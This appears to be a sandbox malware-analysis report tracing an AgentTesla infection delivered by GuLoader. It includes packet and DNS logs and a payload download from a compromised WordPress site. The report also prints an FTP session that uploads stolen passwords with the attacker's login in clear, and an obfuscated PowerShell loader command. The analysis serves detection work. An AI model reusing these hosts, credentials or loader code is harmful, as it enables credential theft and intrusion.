                                Nov 28, 2022 18:14:03.722163916 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722187042 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722187996 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722187996 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722218037 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722270966 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722271919 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722316027 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722326040 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722368956 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722378969 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722457886 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722512960 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722520113 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722513914 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722573042 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722574949 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722625971 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722678900 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722683907 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722733021 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722785950 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722816944 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722840071 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722856045 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722893000 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722917080 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722917080 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722955942 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723025084 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723031044 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723067999 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723081112 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723134995 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723190069 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723217010 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723217010 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723242998 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723298073 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723356962 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723366976 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723426104 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723479986 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723489046 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723534107 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723603964 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723615885 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723615885 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723625898 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723648071 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723664999 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723686934 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723701000 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723706007 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723723888 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723746061 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723763943 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723781109 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723798990 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723817110 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723864079 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723943949 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.837805033 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.837932110 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838031054 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838131905 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838216066 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838216066 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838241100 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838356972 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838402033 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838445902 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838457108 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838506937 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838563919 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838572979 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838618040 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838639975 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838673115 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838725090 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838768005 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838768005 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838778019 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838829994 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838844061 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838845015 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838884115 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838937998 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838984966 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838990927 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839044094 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839047909 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839047909 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839097023 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839097977 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839148998 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839149952 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839201927 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839253902 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839257002 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839307070 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839312077 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839312077 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839348078 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839407921 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839457035 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:08.794603109 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:08.794653893 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:08.794989109 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:08.840126038 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:08.840331078 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:08.874829054 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:08.874842882 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:09.186487913 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:09.186765909 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:09.198235989 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:09.198292017 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:09.199280977 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:09.253065109 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:09.949853897 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:09.992396116 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:10.096756935 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:10.096967936 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:10.097220898 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:10.098072052 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:17.892237902 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:17.924370050 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:17.924516916 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:17.958723068 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:17.959058046 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:17.991437912 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:17.991482973 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:17.991899967 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.040401936 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.040865898 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.073179960 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.073748112 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.106071949 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.106791973 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.139123917 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.139384031 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.171904087 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.173265934 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.205801964 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.207309961 CET4980856411192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.239545107 CET5641149808185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.239708900 CET4980856411192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.239839077 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.274036884 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.274476051 CET4980856411192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.274521112 CET4980856411192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.306560993 CET5641149808185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.306651115 CET5641149808185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.306859016 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.306870937 CET4980856411192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.307097912 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:15:53.011820078 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:15:53.323909044 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:15:53.933120012 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:15:55.136014938 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:15:57.541685104 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:15:57.776221037 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:15:57.808657885 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:15:57.808948994 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:15:57.809441090 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:15:57.809710026 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:16:02.353245974 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:16:11.960388899 CET4980380192.168.11.20192.185.145.188
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Nov 28, 2022 18:14:03.095999956 CET | 52278 | 53 | 192.168.11.20 | 1.1.1.1
                                Nov 28, 2022 18:14:03.119677067 CET | 53 | 52278 | 1.1.1.1 | 192.168.11.20
                                Nov 28, 2022 18:14:08.765639067 CET | 59594 | 53 | 192.168.11.20 | 1.1.1.1
                                Nov 28, 2022 18:14:08.787539005 CET | 53 | 59594 | 1.1.1.1 | 192.168.11.20
                                Nov 28, 2022 18:14:17.763895035 CET | 58435 | 53 | 192.168.11.20 | 1.1.1.1
                                Nov 28, 2022 18:14:17.891381979 CET | 53 | 58435 | 1.1.1.1 | 192.168.11.20
                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                Nov 28, 2022 18:14:03.095999956 CET | 192.168.11.20 | 1.1.1.1 | 0x4412 | Standard query (0) | b3solutionscws.com | A (IP address) | IN (0x0001) | false
                                Nov 28, 2022 18:14:08.765639067 CET | 192.168.11.20 | 1.1.1.1 | 0xf773 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                Nov 28, 2022 18:14:17.763895035 CET | 192.168.11.20 | 1.1.1.1 | 0xead4 | Standard query (0) | ftp.mcmprint.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 28, 2022 18:14:03.119677067 CET | 1.1.1.1 | 192.168.11.20 | 0x4412 | No error (0) | b3solutionscws.com |  | 192.185.145.188 | A (IP address) | IN (0x0001) | false
Nov 28, 2022 18:14:08.787539005 CET | 1.1.1.1 | 192.168.11.20 | 0xf773 | No error (0) | api.ipify.org | api.ipify.org.herokudns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 28, 2022 18:14:08.787539005 CET | 1.1.1.1 | 192.168.11.20 | 0xf773 | No error (0) | api.ipify.org.herokudns.com |  | 54.91.59.199 | A (IP address) | IN (0x0001) | false
Nov 28, 2022 18:14:08.787539005 CET | 1.1.1.1 | 192.168.11.20 | 0xf773 | No error (0) | api.ipify.org.herokudns.com |  | 3.220.57.224 | A (IP address) | IN (0x0001) | false
Nov 28, 2022 18:14:08.787539005 CET | 1.1.1.1 | 192.168.11.20 | 0xf773 | No error (0) | api.ipify.org.herokudns.com |  | 52.20.78.240 | A (IP address) | IN (0x0001) | false
Nov 28, 2022 18:14:08.787539005 CET | 1.1.1.1 | 192.168.11.20 | 0xf773 | No error (0) | api.ipify.org.herokudns.com |  | 3.232.242.170 | A (IP address) | IN (0x0001) | false
Nov 28, 2022 18:14:17.891381979 CET | 1.1.1.1 | 192.168.11.20 | 0xead4 | No error (0) | ftp.mcmprint.net |  | 185.31.121.136 | A (IP address) | IN (0x0001) | false
                                • api.ipify.org
                                • b3solutionscws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49805 | 54.91.59.199 | 443 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.11.20 | 49803 | 192.185.145.188 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
Timestamp | kBytes transferred | Direction | Data
Nov 28, 2022 18:14:03.248883963 CET | 308 | OUT | GET /wp-admin/includes/UtXRqIMUipDp192.pfb HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: b3solutionscws.com
Cache-Control: no-cache
Nov 28, 2022 18:14:03.371316910 CET | 309 | IN | HTTP/1.1 200 OK
                                Date: Mon, 28 Nov 2022 17:14:03 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade
                                Last-Modified: Mon, 28 Nov 2022 12:17:04 GMT
                                Accept-Ranges: bytes
                                Content-Length: 222272
                                Content-Type: application/x-font-type1


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49805 | 54.91.59.199 | 443 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
Timestamp | kBytes transferred | Direction | Data
2022-11-28 17:14:09 UTC | 0 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Host: api.ipify.org
Connection: Keep-Alive
2022-11-28 17:14:10 UTC | 0 | IN | HTTP/1.1 200 OK
Server: Cowboy
Connection: close
Content-Type: text/plain
Vary: Origin
Date: Mon, 28 Nov 2022 17:14:10 GMT
Content-Length: 14
Via: 1.1 vegur
2022-11-28 17:14:10 UTC | 0 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 38 34
Data Ascii: 102.129.143.84


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 28, 2022 18:14:17.958723068 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 19:14. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Nov 28, 2022 18:14:17.959058046 CET | 49807 | 21 | 192.168.11.20 | 185.31.121.136 | USER klogz@mcmprint.net
Nov 28, 2022 18:14:17.991482973 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 331 User klogz@mcmprint.net OK. Password required
Nov 28, 2022 18:14:17.991899967 CET | 49807 | 21 | 192.168.11.20 | 185.31.121.136 | PASS l9Hh{#_(0shZ
Nov 28, 2022 18:14:18.040401936 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 230 OK. Current restricted directory is /
Nov 28, 2022 18:14:18.073179960 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 504 Unknown command
Nov 28, 2022 18:14:18.073748112 CET | 49807 | 21 | 192.168.11.20 | 185.31.121.136 | PWD
Nov 28, 2022 18:14:18.106071949 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 257 "/" is your current location
Nov 28, 2022 18:14:18.106791973 CET | 49807 | 21 | 192.168.11.20 | 185.31.121.136 | CWD /
Nov 28, 2022 18:14:18.139123917 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 250 OK. Current directory is /
Nov 28, 2022 18:14:18.139384031 CET | 49807 | 21 | 192.168.11.20 | 185.31.121.136 | TYPE I
Nov 28, 2022 18:14:18.171904087 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 200 TYPE is now 8-bit binary
Nov 28, 2022 18:14:18.173265934 CET | 49807 | 21 | 192.168.11.20 | 185.31.121.136 | PASV
Nov 28, 2022 18:14:18.205801964 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 227 Entering Passive Mode (185,31,121,136,220,91)
Nov 28, 2022 18:14:18.239839077 CET | 49807 | 21 | 192.168.11.20 | 185.31.121.136 | STOR PW_user-367706_2022_11_28_18_14_15.html
Nov 28, 2022 18:14:18.274036884 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 150 Accepted data connection
Nov 28, 2022 18:14:18.306859016 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 226-File successfully transferred
226 0.033 seconds (measured here), 13.71 Kbytes per second
Nov 28, 2022 18:15:57.808657885 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 226 Logout.


                                Target ID:0
                                Start time:18:12:34
                                Start date:28/11/2022
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
                                Imagebase:0x7ff7b4380000
                                File size:170496 bytes
                                MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:2
                                Start time:18:12:36
                                Start date:28/11/2022
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:CMD.EXE /c echo C:\Windows
                                Imagebase:0x7ff7dd5d0000
                                File size:289792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:3
                                Start time:18:12:36
                                Start date:28/11/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6b8be0000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:4
                                Start time:18:12:59
                                Start date:28/11/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """...""";Function Methyl4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss = $Teviss + $HS.Substring($i, 1); } $Teviss;}$Undefatigable0 = Methyl4 'SoIOrEReXAq ';$Undefatigable1= Methyl4 $Thyridia;&$Undefatigable0 $Undefatigable1;;
                                Imagebase:0xcd0000
                                File size:433152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1784183387.00000000093A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:moderate

                                Target ID:5
                                Start time:18:12:59
                                Start date:28/11/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6b8be0000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:15
                                Start time:18:13:30
                                Start date:28/11/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
                                Imagebase:0xbb0000
                                File size:2141552 bytes
                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:moderate

                                Target ID:16
                                Start time:18:13:31
                                Start date:28/11/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"
                                Imagebase:0x3a0000
                                File size:46832 bytes
                                MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:17
                                Start time:18:13:51
                                Start date:28/11/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                                Imagebase:0xc90000
                                File size:106496 bytes
                                MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000011.00000000.1525854532.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security


                                  Execution Graph

                                  Execution Coverage:10.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:270
                                  Total number of Limit Nodes:22
53321 82ca483 SetThreadUILanguage 53319->53321 53320->53311 53321->53320 53325 82cb662 53322->53325 53323 82ca48e 53323->53316 53327 82cb67e 53325->53327 53326 82cb6ee 53326->53323 53327->53326 53329 82cc290 53327->53329 53330 82cc2b8 53329->53330 53332 82cc42e 53330->53332 53333 82cbb50 53330->53333 53334 82cc940 SetThreadUILanguage 53333->53334 53336 82cc9b1 53334->53336 53336->53332 53337 82cc248 53338 82cc254 53337->53338 53339 82cc276 53337->53339 53338->53339 53340 82cc290 SetThreadUILanguage 53338->53340 53340->53338 53341 7cbd627 53342 7cbd648 53341->53342 53343 7cb9740 GetFileAttributesW 53342->53343 53344 7cbd69b 53343->53344 53345 7cb6cd8 GetFileAttributesW 53344->53345 53346 7cbd6a3 53344->53346 53345->53346 53347 c51628 53348 c5163a 53347->53348 53352 c54c57 53348->53352 53357 c54c58 53348->53357 53349 c5166a 53353 c54c62 53352->53353 53354 c54c87 53353->53354 53362 c54d10 53353->53362 53367 c54d0f 53353->53367 53354->53349 53358 c54c62 53357->53358 53359 c54c87 53358->53359 53360 c54d10 GetFileAttributesW 53358->53360 53361 c54d0f GetFileAttributesW 53358->53361 53359->53349 53360->53359 53361->53359 53363 c54d23 53362->53363 53372 c54d88 53363->53372 53378 c54d78 53363->53378 53364 c54d41 53364->53354 53368 c54d23 53367->53368 53370 c54d88 GetFileAttributesW 53368->53370 53371 c54d78 GetFileAttributesW 53368->53371 53369 c54d41 53369->53354 53370->53369 53371->53369 53373 c54d9d 53372->53373 53374 c54ea5 53373->53374 53375 c54e63 53373->53375 53377 c56790 GetFileAttributesW 53373->53377 53374->53364 53375->53374 53376 c56790 GetFileAttributesW 53375->53376 53376->53374 53377->53375 53380 c54d9d 53378->53380 53379 c54ea5 53379->53364 53380->53379 53381 c54e63 53380->53381 53383 c56790 GetFileAttributesW 53380->53383 53381->53379 53382 c56790 GetFileAttributesW 53381->53382 53382->53379 53383->53381 53384 82c0141 53385 82c0149 53384->53385 53387 7cb4b08 GetFileAttributesW 53385->53387 53389 7cb4b07 GetFileAttributesW 53385->53389 53390 7cb4bcf 
53385->53390 53386 82c01ba 53387->53386 53389->53386 53391 7cb4bd4 53390->53391 53392 7cb5d09 GetFileAttributesW 53391->53392 53393 7cb4cb7 53391->53393 53394 7cb5ea1 GetFileAttributesW 53391->53394 53395 7cb5fb4 GetFileAttributesW 53391->53395 53396 7cb6244 GetFileAttributesW 53391->53396 53392->53393 53393->53386 53394->53393 53395->53393 53396->53393

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
